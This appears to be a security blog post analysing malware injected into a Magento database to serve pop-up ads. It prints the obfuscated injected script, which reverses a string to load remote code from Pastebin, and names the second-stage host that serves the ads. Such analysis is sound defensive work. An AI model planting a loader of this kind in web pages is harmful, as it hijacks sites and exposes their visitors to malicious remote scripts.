Reversed Pastebin Injection in Magento DB

We worked on an infected Magento site that had unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally)

<s c r i p t>document .write('>tpircs/<>"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth"=crs tpircs<'.split("").reverse().join(""))</s c r i p t>

This code uses the reverse() JavaScript function to dynamically inject a remote script directly from - https: / / pastebin . com/raw .php?i = 9tWPBSzY. That’s not the first time we see hackers leveraging the Pastebin service

This time the raw pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script has the actual pop-up code that uses the blablatrafic .com as the intermediary between other ad providers.

In some cases, the same pop-up code injection was noticed on WordPress sites. So this isn’t limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.